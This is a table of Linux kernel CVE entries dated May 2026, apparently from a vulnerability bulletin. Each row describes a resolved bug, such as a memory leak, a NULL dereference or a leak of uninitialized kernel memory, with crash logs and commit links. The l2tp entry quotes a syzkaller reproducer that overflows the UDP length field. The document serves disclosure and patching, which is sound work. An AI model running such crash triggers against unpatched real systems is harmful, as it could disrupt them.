| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: Fix not releasing workqueue on .release() The workqueue associated with a DSA/IAA device is not released when the object is freed. | 2026-05-05 | not yet calculated | CVE-2026-43064 | https://git.kernel.org/stable/c/fd4cb61bbd0fc3a749a8da6145cbb56d8f6dba35 https://git.kernel.org/stable/c/2bb9e9e93adff9cc8a138ae9a3a8d59b3452272e https://git.kernel.org/stable/c/d02c24af126dee45247dc7890409c86d1831859d https://git.kernel.org/stable/c/958e96533ddbd1edd127feb7624a7eed0cc379dc https://git.kernel.org/stable/c/fc34f199eb576b3a73089452fdf0056cc9a9301d https://git.kernel.org/stable/c/3d33de353b1ff9023d5ec73b9becf80ea87af695 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: always drain queued discard work in ext4_mb_release() While reviewing recent ext4 patch[1], Sashiko raised the following concern[2]: > If the filesystem is initially mounted with the discard option, > deleting files will populate sbi->s_discard_list and queue > s_discard_work. If it is then remounted with nodiscard, the > EXT4_MOUNT_DISCARD flag is cleared, but the pending s_discard_work is > neither cancelled nor flushed. [1] https://lore.kernel.org/r/20260319094545.19291-1-qiang.zhang@linux.dev/ [2] https://sashiko.dev/#/patchset/20260319094545.19291-1-qiang.zhang%40linux.dev The concern was valid, but it had nothing to do with the patch[1]. One of the problems with Sashiko in its current (early) form is that it will detect pre-existing issues and report it as a problem with the patch that it is reviewing. In practice, it would be hard to hit deliberately (unless you are a malicious syzkaller fuzzer), since it would involve mounting the file system with -o discard, and then deleting a large number of files, remounting the file system with -o nodiscard, and then immediately unmounting the file system before the queued discard work has a chance to drain on its own. Fix it because it's a real bug, and to avoid Sashiko from raising this concern when analyzing future patches to mballoc.c. | 2026-05-05 | not yet calculated | CVE-2026-43065 | https://git.kernel.org/stable/c/e96c2354b170aaa53300c8e8fd59e41b133160f7 https://git.kernel.org/stable/c/c360e9d0def4f4ae03254a67c683103908555b75 https://git.kernel.org/stable/c/1c82f863f090ab899085bdfade073313384b514b https://git.kernel.org/stable/c/9b4d9dda6a71ad3425c8109d27c4c6bfb9da97b8 https://git.kernel.org/stable/c/812b6a7cd3e7f3a3e8a24db85bc6313c26cb1098 https://git.kernel.org/stable/c/b4737e26d4688b8aea88ad6ea4dbfeb6e78b0327 https://git.kernel.org/stable/c/9ee29d20aab228adfb02ca93f87fb53c56c2f3af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix iloc.bh leak in ext4_fc_replay_inode() error paths During code review, Joseph found that ext4_fc_replay_inode() calls ext4_get_fc_inode_loc() to get the inode location, which holds a reference to iloc.bh that must be released via brelse(). However, several error paths jump to the 'out' label without releasing iloc.bh: - ext4_handle_dirty_metadata() failure - sync_dirty_buffer() failure - ext4_mark_inode_used() failure - ext4_iget() failure Fix this by introducing an 'out_brelse' label placed just before the existing 'out' label to ensure iloc.bh is always released. Additionally, make ext4_fc_replay_inode() propagate errors properly instead of always returning 0. | 2026-05-05 | not yet calculated | CVE-2026-43066 | https://git.kernel.org/stable/c/0892f12cd49fde5d5db68137923db107f894f3a3 https://git.kernel.org/stable/c/5a63033696e60b5d70816f1d119645ac5b0b0a03 https://git.kernel.org/stable/c/9c90449a9ac2cd1ba540ad2561b8b70c1bfb0a25 https://git.kernel.org/stable/c/ca99cbcc316cdfd2040cc2b13d1426ccb3b3b50b https://git.kernel.org/stable/c/19782b4c793b49a6aa4abbb307ddff3610009d21 https://git.kernel.org/stable/c/f7817ad399d604e8639005d87d148b5ec626ad26 https://git.kernel.org/stable/c/c426231e3d51916e83b6d1ab7ed8a65e83bca5b4 https://git.kernel.org/stable/c/ec0a7500d8eace5b4f305fa0c594dd148f0e8d29 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: avoid allocate block from corrupted group in ext4_mb_find_by_goal() There's an issue as follows: ... EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 206 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 2243 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): Delayed block allocation failed for inode 2239 at logical offset 0 with max blocks 1 with error 117 EXT4-fs (mmcblk0p1): This should not happen!! Data will be lost EXT4-fs (mmcblk0p1): error count since last fsck: 1 EXT4-fs (mmcblk0p1): initial error at time 1765597433: ext4_mb_generate_buddy:760 EXT4-fs (mmcblk0p1): last error at time 1765597433: ext4_mb_generate_buddy:760 ... According to the log analysis, blocks are always requested from the corrupted block group. This may happen as follows: ext4_mb_find_by_goal ext4_mb_load_buddy ext4_mb_load_buddy_gfp ext4_mb_init_cache ext4_read_block_bitmap_nowait ext4_wait_block_bitmap ext4_validate_block_bitmap if (!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)) return -EFSCORRUPTED; // There's no logs. if (err) return err; // Will return error ext4_lock_group(ac->ac_sb, group); if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info))) // Unreachable goto out; After commit 9008a58e5dce ("ext4: make the bitmap read routines return real error codes") merged, Commit 163a203ddb36 ("ext4: mark block group as corrupt on block bitmap error") is no real solution for allocating blocks from corrupted block groups. This is because if 'EXT4_MB_GRP_BBITMAP_CORRUPT(e4b->bd_info)' is true, then 'ext4_mb_load_buddy()' may return an error. This means that the block allocation will fail. Therefore, check block group if corrupted when ext4_mb_load_buddy() returns error. | 2026-05-05 | not yet calculated | CVE-2026-43068 | https://git.kernel.org/stable/c/fea6b2e250ff48f10d166011b57a8516ae5438c9 https://git.kernel.org/stable/c/0b84571c886719823d537f05f4f07cad6357c4b7 https://git.kernel.org/stable/c/ffc0a282462d45fee5957621be5afa29752f3b6d https://git.kernel.org/stable/c/2d31a5073f86a177edf44015e0dedb0c47cfd6d8 https://git.kernel.org/stable/c/9370207b36d26e45a8c8ef0500706d37036edd6b https://git.kernel.org/stable/c/1895f7904be71c48f1e6f338b28f24dabd6b8aeb https://git.kernel.org/stable/c/1c0d7c4cde38a887c6d74e0c89ddb25226943c78 https://git.kernel.org/stable/c/46066e3a06647c5b186cc6334409722622d05c44 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_ll: Fix firmware leak on error path Smatch reports: drivers/bluetooth/hci_ll.c:587 download_firmware() warn: 'fw' from request_firmware() not released on lines: 544. In download_firmware(), if request_firmware() succeeds but the returned firmware content is invalid (no data or zero size), the function returns without releasing the firmware, resulting in a resource leak. Fix this by calling release_firmware() before returning when request_firmware() succeeded but the firmware content is invalid. | 2026-05-05 | not yet calculated | CVE-2026-43069 | https://git.kernel.org/stable/c/95e8601af227b2b4390eecf8db6abdb9f6a91f17 https://git.kernel.org/stable/c/e6d95488c8c964d1df0d3e1db44c958706311e86 https://git.kernel.org/stable/c/b2dfbf1b5ff192cefd49574b951a4af9ddd32213 https://git.kernel.org/stable/c/28904375d54b436a757641fb0331537778c0de5a https://git.kernel.org/stable/c/5213ef54528dd1ac79b846e30d8f72ce092794aa https://git.kernel.org/stable/c/9ecbfd93cd6de6c78cb7fd51fe079e36c7ff074b https://git.kernel.org/stable/c/a7803df606a7d22e896b030f619e1d9d20ae0c6b https://git.kernel.org/stable/c/31148a7be723aa9f2e8fbd62424825ab8d577973 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vc4: platform_get_irq_byname() returns an int platform_get_irq_byname() will return a negative value if an error happens, so it should be checked and not just passed directly into devm_request_threaded_irq() hoping all will be ok. | 2026-05-05 | not yet calculated | CVE-2026-43072 | https://git.kernel.org/stable/c/63c11b19cdc154fa848a6c3b535bfb1dc7b60378 https://git.kernel.org/stable/c/ef2ee9db13b68c5e332b77c0a7108a2d4d56e114 https://git.kernel.org/stable/c/0185e0494a561edfc482507f9de89c2ad798b33d https://git.kernel.org/stable/c/9c10b83a004442c93d7a484c3d221a06a45821e1 https://git.kernel.org/stable/c/0c1b117f7ba46fb8f6ebc5e0bfe5b58568c301ba https://git.kernel.org/stable/c/e597a809a2b97e927060ba182f58eb3e6101bc70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86-64: rename misleadingly named '__copy_user_nocache()' function This function was a masterclass in bad naming, for various historical reasons. It claimed to be a non-cached user copy. It is literally _neither_ of those things. It's a specialty memory copy routine that uses non-temporal stores for the destination (but not the source), and that does exception handling for both source and destination accesses. Also note that while it works for unaligned targets, any unaligned parts (whether at beginning or end) will not use non-temporal stores, since only words and quadwords can be non-temporal on x86. The exception handling means that it _can_ be used for user space accesses, but not on its own - it needs all the normal "start user space access" logic around it. But typically the user space access would be the source, not the non-temporal destination. That was the original intention of this, where the destination was some fragile persistent memory target that needed non-temporal stores in order to catch machine check exceptions synchronously and deal with them gracefully. Thus that non-descriptive name: one use case was to copy from user space into a non-cached kernel buffer. However, the existing users are a mix of that intended use-case, and a couple of random drivers that just did this as a performance tweak. Some of those random drivers then actively misused the user copying version (with STAC/CLAC and all) to do kernel copies without ever even caring about the exception handling, _just_ for the non-temporal destination. Rename it as a first small step to actually make it halfway sane, and change the prototype to be more normal: it doesn't take a user pointer unless the caller has done the proper conversion, and the argument size is the full size_t (it still won't actually copy more than 4GB in one go, but there's also no reason to silently truncate the size argument in the caller). Finally, use this now sanely named function in the NTB code, which mis-used a user copy version (with STAC/CLAC and all) of this interface despite it not actually being a user copy at all. | 2026-05-05 | not yet calculated | CVE-2026-43073 | https://git.kernel.org/stable/c/14b9194db4a28421a4dbe5d6e519efbaa7c5f3cd https://git.kernel.org/stable/c/c6d4e0599e7e73abc04e2488dfeb7940c4039660 https://git.kernel.org/stable/c/d993e1723aa2a085aa0d72e70ea889031fc225b4 https://git.kernel.org/stable/c/efea91ad1729ff1853d7418e4d3bc27d085e72d0 https://git.kernel.org/stable/c/d187a86de793f84766ea40b9ade7ac60aabbb4fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Fix minimum RX size check for decryption The check for the minimum receive buffer size did not take the tag size into account during decryption. Fix this by adding the required extra length. | 2026-05-06 | not yet calculated | CVE-2026-43077 | https://git.kernel.org/stable/c/74a66fdb5282d89e348b00c42cfca3a936946d94 https://git.kernel.org/stable/c/fd427dd84f224309afbcc2cb67c7bb770a01265c https://git.kernel.org/stable/c/1c76b5675119f694458293a2a81f40731c69bd32 https://git.kernel.org/stable/c/e86ab1e5661386a874fbb8551f0c04b8e9f8ad22 https://git.kernel.org/stable/c/af2fa2fbbced26129813274b8b3f7705f280e174 https://git.kernel.org/stable/c/78cea133daf721698876e56135049a96d39d610a https://git.kernel.org/stable/c/3afdc15d6173614d7d834517d9b65e7aa5a08548 https://git.kernel.org/stable/c/3d14bd48e3a77091cbce637a12c2ae31b4a1687c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86/intel/uncore: Skip discovery table for offline dies This warning can be triggered if NUMA is disabled and the system boots with fewer CPUs than the number of CPUs in die 0. WARNING: CPU: 9 PID: 7257 at uncore.c:1157 uncore_pci_pmu_register+0x136/0x160 [intel_uncore] Currently, the discovery table continues to be parsed even if all CPUs in the associated die are offline. This can lead to an array overflow at "pmu->boxes[die] = box" in uncore_pci_pmu_register(), which may trigger the warning above or cause other issues. | 2026-05-06 | not yet calculated | CVE-2026-43079 | https://git.kernel.org/stable/c/cfab2c817d2e7e0bee98d66850246ce842ed5f18 https://git.kernel.org/stable/c/6cfc187d85f18f976d0fe527d4c6f6171542cc19 https://git.kernel.org/stable/c/f34feda8e0c9535fee3f8870ce8bab53c2798f71 https://git.kernel.org/stable/c/7a2cb02437d92ed14fe494d8994056d5bd2c72b4 https://git.kernel.org/stable/c/7b568e9eba2fad89a696f22f0413d44cf4a1f892 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: l2tp: Drop large packets with UDP encap syzbot reported a WARN on my patch series [1]. The actual issue is an overflow of 16-bit UDP length field, and it exists in the upstream code. My series added a debug WARN with an overflow check that exposed the issue, that's why syzbot tripped on my patches, rather than on upstream code. syzbot's repro: r0 = socket$pppl2tp(0x18, 0x1, 0x1) r1 = socket$inet6_udp(0xa, 0x2, 0x0) connect$inet6(r1, &(0x7f00000000c0)={0xa, 0x0, 0x0, @loopback, 0xfffffffc}, 0x1c) connect$pppl2tp(r0, &(0x7f0000000240)=@pppol2tpin6={0x18, 0x1, {0x0, r1, 0x4, 0x0, 0x0, 0x0, {0xa, 0x4e22, 0xffff, @ipv4={'\x00', '\xff\xff', @empty}}}}, 0x32) writev(r0, &(0x7f0000000080)=[{&(0x7f0000000000)="ee", 0x34000}], 0x1) It basically sends an oversized (0x34000 bytes) PPPoL2TP packet with UDP encapsulation, and l2tp_xmit_core doesn't check for overflows when it assigns the UDP length field. The value gets trimmed to 16 bits. Add an overflow check that drops oversized packets and avoids sending packets with trimmed UDP length to the wire. syzbot's stack trace (with my patch applied): len >= 65536u WARNING: ./include/linux/udp.h:38 at udp_set_len_short include/linux/udp.h:38 [inline], CPU#1: syz.0.17/5957 WARNING: ./include/linux/udp.h:38 at l2tp_xmit_core net/l2tp/l2tp_core.c:1293 [inline], CPU#1: syz.0.17/5957 WARNING: ./include/linux/udp.h:38 at l2tp_xmit_skb+0x1204/0x18d0 net/l2tp/l2tp_core.c:1327, CPU#1: syz.0.17/5957 Modules linked in: CPU: 1 UID: 0 PID: 5957 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:udp_set_len_short include/linux/udp.h:38 [inline] RIP: 0010:l2tp_xmit_core net/l2tp/l2tp_core.c:1293 [inline] RIP: 0010:l2tp_xmit_skb+0x1204/0x18d0 net/l2tp/l2tp_core.c:1327 Code: 0f 0b 90 e9 21 f9 ff ff e8 e9 05 ec f6 90 0f 0b 90 e9 8d f9 ff ff e8 db 05 ec f6 90 0f 0b 90 e9 cc f9 ff ff e8 cd 05 ec f6 90 <0f> 0b 90 e9 de fa ff ff 44 89 f1 80 e1 07 80 c1 03 38 c1 0f 8c 4f RSP: 0018:ffffc90003d67878 EFLAGS: 00010293 RAX: ffffffff8ad985e3 RBX: ffff8881a6400090 RCX: ffff8881697f0000 RDX: 0000000000000000 RSI: 0000000000034010 RDI: 000000000000ffff RBP: dffffc0000000000 R08: 0000000000000003 R09: 0000000000000004 R10: dffffc0000000000 R11: fffff520007acf00 R12: ffff8881baf20900 R13: 0000000000034010 R14: ffff8881a640008e R15: ffff8881760f7000 FS: 000055557e81f500(0000) GS:ffff8882a9467000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000033000 CR3: 00000001612f4000 CR4: 00000000000006f0 Call Trace: <TASK> pppol2tp_sendmsg+0x40a/0x5f0 net/l2tp/l2tp_ppp.c:302 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] sock_write_iter+0x503/0x550 net/socket.c:1195 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1 vfs_writev+0x33c/0x990 fs/read_write.c:1059 do_writev+0x154/0x2e0 fs/read_write.c:1105 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0x14d/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f636479c629 Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffffd4241c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000014 RAX: ffffffffffffffda RBX: 00007f6364a15fa0 RCX: 00007f636479c629 RDX: 0000000000000001 RSI: 0000200000000080 RDI: 0000000000000003 RBP: 00007f6364832b39 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f6364a15fac R14: 00007f6364a15fa0 R15: 00007f6364a15fa0 </TASK> [1]: https://lore.kernel.org/all/20260226201600.222044-1-alice.kernel@fastmail.im/ | 2026-05-06 | not yet calculated | CVE-2026-43080 | https://git.kernel.org/stable/c/9ccce02d501335f59a02f26c878c5e095b16302f https://git.kernel.org/stable/c/77c1489398c85a844f90205f5e76fd6bc8bb4089 https://git.kernel.org/stable/c/86534c97abd6365a9a021fd767a2023e63c44469 https://git.kernel.org/stable/c/f295fe86e22ff0a2ecebf05e30a387e5cf6f6ddc https://git.kernel.org/stable/c/ebe560ea5f54134279356703e73b7f867c89db13 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ipa: fix GENERIC_CMD register field masks for IPA v5.0+ Fix the field masks to match the hardware layout documented in downstream GSI (GSI_V3_0_EE_n_GSI_EE_GENERIC_CMD_*). Notably this fixes a WARN I was seeing when I tried to send "stop" to the MPSS remoteproc while IPA was up. | 2026-05-06 | not yet calculated | CVE-2026-43081 | https://git.kernel.org/stable/c/a7d326dfb13b5a0763eccfd78836fe15199fc499 https://git.kernel.org/stable/c/d1c66396796f23f7201b1addf06f62515035354d https://git.kernel.org/stable/c/bafc45ea30d297002750396d5f10e3018bf2cd60 https://git.kernel.org/stable/c/2aa50d2c1f631b405849da246043c6f683af7489 https://git.kernel.org/stable/c/9709b56d908acc120fe8b4ae250b3c9d749ea832 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: txgbe: leave space for null terminators on property_entry Lists of struct property_entry are supposed to be terminated with an empty property, but this driver currently seems to be allocating exactly the number of entries used. Change the struct definition to leave an extra element for all property_entry. | 2026-05-06 | not yet calculated | CVE-2026-43082 | https://git.kernel.org/stable/c/00e1d650fa4b228ef1faea8e29effe4b4861e6e4 https://git.kernel.org/stable/c/16eb3c2f86de9a21aefe7a6386607d4cd3947a77 https://git.kernel.org/stable/c/8eff73e58e1f8fe991522acb863164319a7f7dd3 https://git.kernel.org/stable/c/92c09262dac565a6b831fd724b81fe4ff76f51b4 https://git.kernel.org/stable/c/5a37d228799b0ec2c277459c83c814a59d310bc3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_log: initialize nfgenmsg in NLMSG_DONE terminator When batching multiple NFLOG messages (inst->qlen > 1), __nfulnl_send() appends an NLMSG_DONE terminator with sizeof(struct nfgenmsg) payload via nlmsg_put(), but never initializes the nfgenmsg bytes. The nlmsg_put() helper only zeroes alignment padding after the payload, not the payload itself, so four bytes of stale kernel heap data are leaked to userspace in the NLMSG_DONE message body. Use nfnl_msg_put() to build the NLMSG_DONE terminator, which initializes the nfgenmsg payload via nfnl_fill_hdr(), consistent with how __build_packet_message() already constructs NFULNL_MSG_PACKET headers. | 2026-05-06 | not yet calculated | CVE-2026-43085 | https://git.kernel.org/stable/c/368c22aea490f6f50df831b4f9e3623787686c5b https://git.kernel.org/stable/c/d1399632ba255d2e02c757af5d9f5d9279ce168c https://git.kernel.org/stable/c/d552bcfca323d175664d7444989b04f55666978a https://git.kernel.org/stable/c/15d209bccf9273b4a8b4e579ba0e92d065b6ec8c https://git.kernel.org/stable/c/1f3083aec8836213da441270cdb1ab612dd82cf4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: fix NULL deref in ip_vs_add_service error path When ip_vs_bind_scheduler() succeeds in ip_vs_add_service(), the local variable sched is set to NULL. If ip_vs_start_estimator() subsequently fails, the out_err cleanup calls ip_vs_unbind_scheduler(svc, sched) with sched == NULL. ip_vs_unbind_scheduler() passes the cur_sched NULL check (because svc->scheduler was set by the successful bind) but then dereferences the NULL sched parameter at sched->done_service, causing a kernel panic at offset 0x30 from NULL. Oops: general protection fault, [..] [#1] PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] RIP: 0010:ip_vs_unbind_scheduler (net/netfilter/ipvs/ip_vs_sched.c:69) Call Trace: <TASK> ip_vs_add_service.isra.0 (net/netfilter/ipvs/ip_vs_ctl.c:1500) do_ip_vs_set_ctl (net/netfilter/ipvs/ip_vs_ctl.c:2809) nf_setsockopt (net/netfilter/nf_sockopt.c:102) [..] Fix by simply not clearing the local sched variable after a successful bind. ip_vs_unbind_scheduler() already detects whether a scheduler is installed via svc->scheduler, and keeping sched non-NULL ensures the error path passes the correct pointer to both ip_vs_unbind_scheduler() and ip_vs_scheduler_put(). While the bug is older, the problem pops up in more recent kernels (6.2), when the new error path is taken after the ip_vs_start_estimator() call. | 2026-05-06 | not yet calculated | CVE-2026-43086 | https://git.kernel.org/stable/c/730663352c9178f33fcf5929f4a37c1f1ca5a693 https://git.kernel.org/stable/c/4039959315008888dd53c37674d33351817a5166 https://git.kernel.org/stable/c/a32dabacee111cea083ddd57a03635672e1bff29 https://git.kernel.org/stable/c/c2ddbe577e2ebf63f2d8fb15cdc7503af70f3e94 https://git.kernel.org/stable/c/9a91797e61d286805ae10a92cc48959c30800556 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: mcp23s08: Disable all pin interrupts during probe A chip being probed may have the interrupt-on-change feature enabled on some of its pins, for example after a reboot. This can cause the chip to generate interrupts for pins that don't have a registered nested handler, which leads to a kernel crash such as below: [ 7.928897] Unable to handle kernel read from unreadable memory at virtual address 00000000000000ac [ 7.932314] Mem abort info: [ 7.935081] ESR = 0x0000000096000004 [ 7.938808] EC = 0x25: DABT (current EL), IL = 32 bits [ 7.944094] SET = 0, FnV = 0 [ 7.947127] EA = 0, S1PTW = 0 [ 7.950247] FSC = 0x04: level 0 translation fault [ 7.955101] Data abort info: [ 7.957961] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 7.963421] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 7.968447] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 7.973734] user pgtable: 4k pages, 48-bit VAs, pgdp=00000000089b7000 [ 7.980148] [00000000000000ac] pgd=0000000000000000, p4d=0000000000000000 [ 7.986913] Internal error: Oops: 0000000096000004 [#1] SMP [ 7.992545] Modules linked in: [ 8.073678] CPU: 0 UID: 0 PID: 81 Comm: irq/18-4-0025 Not tainted 7.0.0-rc6-gd2b5a1f931c8-dirty #199 [ 8.073689] Hardware name: Khadas VIM3 (DT) [ 8.073692] pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 8.094639] pc : _raw_spin_lock_irq+0x40/0x80 [ 8.098970] lr : handle_nested_irq+0x2c/0x168 [ 8.098979] sp : ffff800082b2bd20 [ 8.106599] x29: ffff800082b2bd20 x28: ffff800080107920 x27: ffff800080104d88 [ 8.106611] x26: ffff000003298080 x25: 0000000000000001 x24: 000000000000ff00 [ 8.113707] x23: 0000000000000001 x22: 0000000000000000 x21: 000000000000000e [ 8.120850] x20: 0000000000000000 x19: 00000000000000ac x18: 0000000000000000 [ 8.135046] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [ 8.135062] x14: ffff800081567ea8 x13: ffffffffffffffff x12: 0000000000000000 [ 8.135070] x11: 00000000000000c0 x10: 0000000000000b60 x9 : ffff800080109e0c [ 8.135078] x8 : 1fffe0000069dbc1 x7 : 0000000000000001 x6 : ffff0000034ede00 [ 8.135086] x5 : 0000000000000000 x4 : ffff0000034ede08 x3 : 0000000000000001 [ 8.163460] x2 : 0000000000000000 x1 : 0000000000000001 x0 : 00000000000000ac [ 8.170560] Call trace: [ 8.180094] _raw_spin_lock_irq+0x40/0x80 (P) [ 8.184443] mcp23s08_irq+0x248/0x358 [ 8.184462] irq_thread_fn+0x34/0xb8 [ 8.184470] irq_thread+0x1a4/0x310 [ 8.195093] kthread+0x13c/0x150 [ 8.198309] ret_from_fork+0x10/0x20 [ 8.201850] Code: d65f03c0 d2800002 52800023 f9800011 (885ffc01) [ 8.207931] ---[ end trace 0000000000000000 ]--- This issue has always been present, but has been latent until commit "f9f4fda15e72" ("pinctrl: mcp23s08: init reg_defaults from HW at probe and switch cache type"), which correctly removed reg_defaults from the regmap and as a side effect changed the behavior of the interrupt handler so that the real value of the MCP_GPINTEN register is now being read from the chip instead of using a bogus 0 default value; a non-zero value for this register can trigger the invocation of a nested handler which may not exist (yet). Fix this issue by disabling all pin interrupts during initialization. | 2026-05-06 | not yet calculated | CVE-2026-43087 | https://git.kernel.org/stable/c/f8c3258541a0680a4ebc08b05b2bc5fdad3288a9 https://git.kernel.org/stable/c/db5b8cecbdf479ad13156af750377e5b43853fab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: af_key: zero aligned sockaddr tail in PF_KEY exports PF_KEY export paths use `pfkey_sockaddr_size()` when reserving sockaddr payload space, so IPv6 addresses occupy 32 bytes on the wire. However, `pfkey_sockaddr_fill()` initializes only the first 28 bytes of `struct sockaddr_in6`, leaving the final 4 aligned bytes uninitialized. Not every PF_KEY message is affected. The state and policy dump builders already zero the whole message buffer before filling the sockaddr payloads. Keep the fix to the export paths that still append aligned sockaddr payloads with plain `skb_put()`: - `SADB_ACQUIRE` - `SADB_X_NAT_T_NEW_MAPPING` - `SADB_X_MIGRATE` Fix those paths by clearing only the aligned sockaddr tail after `pfkey_sockaddr_fill()`. | 2026-05-06 | not yet calculated | CVE-2026-43088 | https://git.kernel.org/stable/c/2e74f974359b5382ecbe8536abbb5b837eb6c724 https://git.kernel.org/stable/c/426c355742f02cf743b347d9d7dbdc1bfbfa31ef |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm_user: fix info leak in build_mapping() struct xfrm_usersa_id has a one-byte padding hole after the proto field, which ends up never getting set to zero before copying out to userspace. Fix that up by zeroing out the whole structure before setting individual variables. | 2026-05-06 | not yet calculated | CVE-2026-43089 | https://git.kernel.org/stable/c/d3125c541a96fb3c0fc7210112684baf22b6c24d https://git.kernel.org/stable/c/5a1a4b049ddde41466ccac0daeec326254b133f2 https://git.kernel.org/stable/c/f779a6b6cdb6e12baa0663063ac59ab2a8f20c0c https://git.kernel.org/stable/c/700c9622b23c33b5933e6dcea816492c064e4e10 https://git.kernel.org/stable/c/1beb76b2053b68c491b78370794b8ff63c8f8c02 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: fix refcount leak in xfrm_migrate_policy_find syzkaller reported a memory leak in xfrm_policy_alloc: BUG: memory leak unreferenced object 0xffff888114d79000 (size 1024): comm "syz.1.17", pid 931 ... xfrm_policy_alloc+0xb3/0x4b0 net/xfrm/xfrm_policy.c:432 The root cause is a double call to xfrm_pol_hold_rcu() in xfrm_migrate_policy_find(). The lookup function already returns a policy with held reference, making the second call redundant. Remove the redundant xfrm_pol_hold_rcu() call to fix the refcount imbalance and prevent the memory leak. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2026-05-06 | not yet calculated | CVE-2026-43090 | https://git.kernel.org/stable/c/21e235a36cfb6d145cefb10728f12f5dc5412f54 https://git.kernel.org/stable/c/836ee1b0426ea3db31531e9581cc32f513d24e32 https://git.kernel.org/stable/c/70c2a89a3bc207c3bfbf6f21bb439809e0a4a27a https://git.kernel.org/stable/c/83317cce60a032c49480dcdabe146435bd689d03 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xsk: validate MTU against usable frame size on bind AF_XDP bind currently accepts zero-copy pool configurations without verifying that the device MTU fits into the usable frame space provided by the UMEM chunk. This becomes a problem since we started to respect tailroom which is subtracted from chunk_size (among with headroom). 2k chunk size might not provide enough space for standard 1500 MTU, so let us catch such settings at bind time. Furthermore, validate whether underlying HW will be able to satisfy configured MTU wrt XSK's frame size multiplied by supported Rx buffer chain length (that is exposed via net_device::xdp_zc_max_segs). | 2026-05-06 | not yet calculated | CVE-2026-43092 | https://git.kernel.org/stable/c/a55793e5a97d4e39bdb380873a9780fe0010bff6 https://git.kernel.org/stable/c/f669d60db11dbabb96279f2b20f9d1cba43cddb2 https://git.kernel.org/stable/c/25e1e91a8da819924df0b16e3812d7b24c8ce133 https://git.kernel.org/stable/c/b2f4daa6422fd6cc0cec969794dab4a88ea4cea1 https://git.kernel.org/stable/c/36ee60b569ba0dfb6f961333b90d19ab5b323fa9 |
